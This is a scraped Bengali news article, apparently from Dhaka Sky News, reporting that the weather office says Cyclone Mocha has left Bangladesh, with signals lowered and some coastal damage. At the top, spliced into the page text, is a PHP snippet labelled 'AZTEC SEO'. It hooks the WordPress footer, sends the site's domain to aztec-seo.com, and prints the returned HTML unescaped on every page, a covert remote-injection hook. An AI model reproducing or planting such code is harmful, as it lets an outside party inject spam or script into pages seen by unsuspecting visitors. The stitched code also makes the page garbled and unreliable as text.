/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); মোকা বাংলাদেশ থেকে চলে গেছে: আবহাওয়া অধিদপ্তর | Dhaka Sky News

মোখা এগোচ্ছে, উপকূলবাসীর উৎকণ্ঠা বাড়ছে

আগের সংবাদ

নায়ক ফারুক আর নেই

পরের সংবাদ

মোকা বাংলাদেশ থেকে চলে গেছে: আবহাওয়া অধিদপ্তর

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: May 14, 2023 , 9:22 pm

বাংলাদেশের আবহাওয়া অধিদপ্তর জানিয়েছে, ঘূর্ণিঝড় ‘মোকা’ বাংলাদেশের ভূখণ্ড থেকে চলে গেছে। রোববার রাত ৮ টার দিকে সংস্থাটির পরিচালক আজিজুর রহমান এ তথ্য নিশ্চিত করেন। তিনি বলেন, এটা আমাদের দেশ থেকে পুরোপুরি চলে গেছে। আমাদের ভূখণ্ডে এটার আর কোন অস্তিত্ব নেই।’
এদিকে কক্সবাজার সমুদ্র বন্দরের ওপর ১০ নম্বর মহাবিপদ সংকেত নামিয়ে তিন নম্বর সতর্ক সংকেত দেখাতে বলা হয়েছে।
আজিজুর রহমান বলেন, ঝড়টা আর নেই, মানুষজন তাদের স্বাভাবিক জীবনে ফিরে যেতে পারে। তবে ঝড় চলে গেলেও সেটার প্রভাবে আগামী কয়েকদিন বৃষ্টি থাকবে। সেই সঙ্গে আগামী ২৪ ঘণ্টায় সমুদ্র উত্তাল থাকায় মাছ ধরতে আপাতত সমুদ্রে না যাওয়ার পরামর্শ দিয়েছে আবহাওয়া অধিদপ্তর।
মঙ্গলবার নাগাদ সব ধরনের সতর্ক সংকেত নামিয়ে আনা হবে বলে তিনি আশা করছেন।
তিনি জানান, ঝড়ের কারণে তারা যতদূর জানতে পারছেন, সেন্ট মার্টিন, টেকনাফ আর কক্সবাজারে কিছুটা ক্ষতিগ্রস্ত হয়েছে। এটা অবশ্য তারা আগেই ধারণা করে সতর্ক করে দিয়েছিলেন। ঝড় চলে যাওয়ায় অতিবৃষ্টি বা ভূমি ধ্বসের সম্ভাবনাও নেই বলে জানান তিনি।